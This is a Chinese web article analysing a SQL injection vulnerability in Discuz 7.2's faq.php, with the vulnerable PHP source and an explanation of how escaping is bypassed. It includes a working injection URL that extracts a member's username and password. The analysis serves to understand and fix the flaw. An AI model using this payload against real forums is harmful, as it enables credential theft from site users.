Discuz7.2版的faq.php SQL注入漏洞分析

 更新时间:2014年08月06日 10:20:16   转载 投稿:junjie  
这篇文章主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下

注入代码实例:

复制代码 代码如下:

https://www.jb51.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

漏洞分析: by phithon

复制代码 代码如下:

($action == 'grouppermission') {

...
        ksort($gids);
        $groupids = array();
        foreach($gids as $row) {
                $groupids[] = $row[0];
        }

        $query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");
...
}
function implodeids($array) {
        if(!empty($array)) {
                return "'".implode("','", is_array($array) ? $array : array($array))."'";
        } else {
                return '';
        }
}

首先定义一个数组groupids,然后遍历$gids(这也是个数组,就是$_GET[gids]),将数组中的所有值的第一位取出来放在groupids中。

为什么这个操作就造成了注入?

discuz在全局会对GET数组进行addslashes转义,也就是说会将'转义成\',所以,如果我们的传入的参数是:gids[1]='的话,会被转义成$gids[1]=\',而这个赋值语句$groupids[] = $row[0]就相当于取了字符串的第一个字符,也就是\,把转义符号取出来了。

再看后面,在将数据放入sql语句前,他用implodeids处理了一遍。我们看到implodeids函数

很简单一个函数,就是将刚才的$groupids数组用','分割开,组成一个类似于'1','2','3','4'的字符串返回。

但是我们的数组刚取出来一个转义符,它会将这里一个正常的'转义掉,比如这样:
'1','\','3','4'
有没有看出有点不同,第4个单引号被转义了,也就是说第5个单引号和第3个单引号闭合。

相关文章

  • Laravel框架实现超简单的分页效果示例

    Laravel框架实现超简单的分页效果示例

    这篇文章主要介绍了Laravel框架实现超简单的分页效果,结合实例形式分析了Laravel框架实现分页功能的相关控制器、视图、模板调用等相关操作技巧,需要的朋友可以参考下
    2019-02-02
  • php导入模块文件分享

    php导入模块文件分享

    本文给大家分享的是php导入模块文件分享,主要参数有导入文件路径字符串,可以用"."代替"/", 导入文件类型的扩展名(带"."号),也可以是class/inc(简写方式), 如果导入成功则返回true,否则返回异常对象,有需要的小伙伴参考下吧。
    2015-03-03
  • Laravel 5.5中为响应请求提供的可响应接口详解

    Laravel 5.5中为响应请求提供的可响应接口详解

    这篇文章主要给大家介绍了关于Laravel 5.5中为响应请求提供的可响应接口的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。
    2017-11-11
  • CI框架文件上传类及图像处理类用法分析

    CI框架文件上传类及图像处理类用法分析

    这篇文章主要介绍了CI框架文件上传类及图像处理类用法,设计CI框架图片上传及缩略图操作的相关技巧,需要的朋友可以参考下
    2016-05-05
  • QQ登录 PHP OAuth示例代码

    QQ登录 PHP OAuth示例代码

    申请是立即通过的 目前腾讯仅开放获取昵称和头像的API,以后会陆续推出其他API 头像是QQ空间的,官方文档都是写QQ空间登录
    2011-07-07
  • PHP date函数常用时间处理方法

    PHP date函数常用时间处理方法

    这篇文章主要介绍了PHP date函数常用时间处理方法,本文介绍获取今天、明天、昨天、一周后、一个月前、一个月后等时间的方法,需要的朋友可以参考下
    2015-05-05
  • dhtmlxTree目录树增加右键菜单以及拖拽排序的实现方法

    dhtmlxTree目录树增加右键菜单以及拖拽排序的实现方法

    本篇文章介绍了,dhtmlxTree目录树增加右键菜单以及拖拽排序的实现方法。需要的朋友参考下
    2013-04-04
  • PHP执行shell脚本运行程序不产生core文件的方法

    PHP执行shell脚本运行程序不产生core文件的方法

    下面小编就为大家带来一篇PHP执行shell脚本运行程序不产生core文件的方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2016-12-12
  • laravel-admin 在列表页添加自定义按钮的例子

    laravel-admin 在列表页添加自定义按钮的例子

    今天小编就为大家分享一篇laravel-admin 在列表页添加自定义按钮的例子,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
    2019-09-09
  • php getcwd与dirname(__FILE__)区别详解

    php getcwd与dirname(__FILE__)区别详解

    这篇文章主要介绍了php getcwd与dirname(__FILE__)区别详解的相关资料,需要的朋友可以参考下
    2016-09-09

最新评论